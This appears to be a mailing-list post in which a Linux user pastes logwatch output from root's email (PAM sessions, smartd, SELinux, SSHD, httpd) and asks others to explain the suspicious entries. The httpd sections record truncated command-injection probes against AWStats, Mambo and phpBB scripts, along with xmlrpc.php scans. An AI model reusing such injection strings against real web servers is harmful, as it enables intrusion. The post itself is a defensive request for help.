I haven't read root's email in about a month. Now that I get around to it, I am surprised to see things that I have never seen before, such as:

 --------------------- pam_unix Begin ------------------------

 kde-np:
    Unknown Entries:
       session opened for user dotancohen by (uid=0): 1 Time(s)

 ---------------------- pam_unix End -------------------------

 --------------------- Smartd Begin ------------------------

 **Unmatched Entries**
 smartd received signal 15: Terminated
 smartd is exiting (exit status 0)

 ---------------------- Smartd End -------------------------

 --------------------- Selinux Audit Begin ------------------------

 Number of audit daemon starts: 1
 Number of audit daemon stops: 2

 *** Logs which could mean a bug ***
    major=252 name_count=0: freeing multiple contexts (1)
    major=113 name_count=0: freeing multiple contexts (2)

 ---------------------- Selinux Audit End -------------------------

 --------------------- SSHD Begin ------------------------

 SSHD Killed: 1 Time(s)
 SSHD Started: 1 Time(s)

 ---------------------- SSHD End -------------------------

 --------------------- httpd Begin ------------------------

 Requests with error response codes
    404 Not Found
       /cvs/index2.php?_REQUEST[option]=com_conte ... cho%20YYY;echo|: 1 Time(s)
       /cvs/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
       /favicon.ico: 32 Time(s)
       /javascript/HM_Arrays.js: 1 Time(s)
       /javascript/HM_ScriptDOM.js: 1 Time(s)
       /mambo/index2.php?_REQUEST[option]=com_con ... cho%20YYY;echo|: 1 Time(s)
       /php/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)

 ---------------------- httpd End -------------------------

 --------------------- pam_unix Begin ------------------------

 kde:
    Unknown Entries:
       session closed for user dotancohen: 3 Time(s)
       session opened for user dotancohen by (uid=0): 3 Time(s)

 kde-np:
    Unknown Entries:
       session closed for user dotancohen: 3 Time(s)
       session opened for user dotancohen by (uid=0): 2 Time(s)

 su:
    Sessions Opened:
       (uid=500) -> root: 3 Time(s)

 system-config-display:
    Unknown Entries:
       auth could not identify password for [root]: 1 Time(s)

 ---------------------- pam_unix End -------------------------

 --------------------- httpd Begin ------------------------

 Requests with error response codes
    403 Forbidden
       /cgi-bin/awstats.pl?configdir=|echo;echo%2 ... cho%20YYY;echo|: 1 Time(s)
       /cgi-bin/awstats/awstats.pl?configdir=|ech ... cho%20YYY;echo|: 1 Time(s)
    404 Not Found
       /Forums/admin/admin_styles.php?phpbb_root_ ... cho%20YYY;echo|: 1 Time(s)
       /Forums/admin/admin_styles.phpadmin_styles ... cho%20YYY;echo|: 1 Time(s)
       /admin_styles.phpadmin_styles.php?phpbb_ro ... cho%20YYY;echo|: 1 Time(s)
       /awstats/awstats.pl?configdir=|echo;echo%2 ... cho%20YYY;echo|: 1 Time(s)
       /blog/xmlrpc.php: 2 Time(s)
       /blog/xmlsrv/xmlrpc.php: 2 Time(s)
       /blogs/xmlsrv/xmlrpc.php: 2 Time(s)
       /cvs/index2.php?_REQUEST[option]=com_conte ... cho%20YYY;echo|: 1 Time(s)
       /cvs/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
       /drupal/xmlrpc.php: 2 Time(s)
       /mambo/index2.php?_REQUEST[option]=com_con ... cho%20YYY;echo|: 1 Time(s)
       /modules/Forums/admin/admin_styles.php?php ... cho%20YYY;echo|: 1 Time(s)
       /modules/Forums/admin/admin_styles.phpadmi ... cho%20YYY;echo|: 2 Time(s)
       /modules/coppermine/themes/default/theme.p ... cho%20YYY;echo|: 2 Time(s)
       /php/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
       /phpgroupware/xmlrpc.php: 2 Time(s)
       /wordpress/xmlrpc.php: 2 Time(s)
       /xmlrpc.php: 4 Time(s)
       /xmlrpc/xmlrpc.php: 2 Time(s)
       /xmlsrv/xmlrpc.php: 2 Time(s)

 ---------------------- httpd End -------------------------

 --------------------- pam_unix Begin ------------------------

 kde-np:
    Unknown Entries:
       session closed for user dotancohen: 2 Time(s)
       session opened for user dotancohen by (uid=0): 1 Time(s)

 su:
    Sessions Opened:
       (uid=500) -> root: 3 Time(s)

 ---------------------- pam_unix End -------------------------

These are the most suspicious. If anyone could clarify them a bit, I would appreciate it. Thank you!

Dotan Cohen
http://technology-sleuth.com/index.php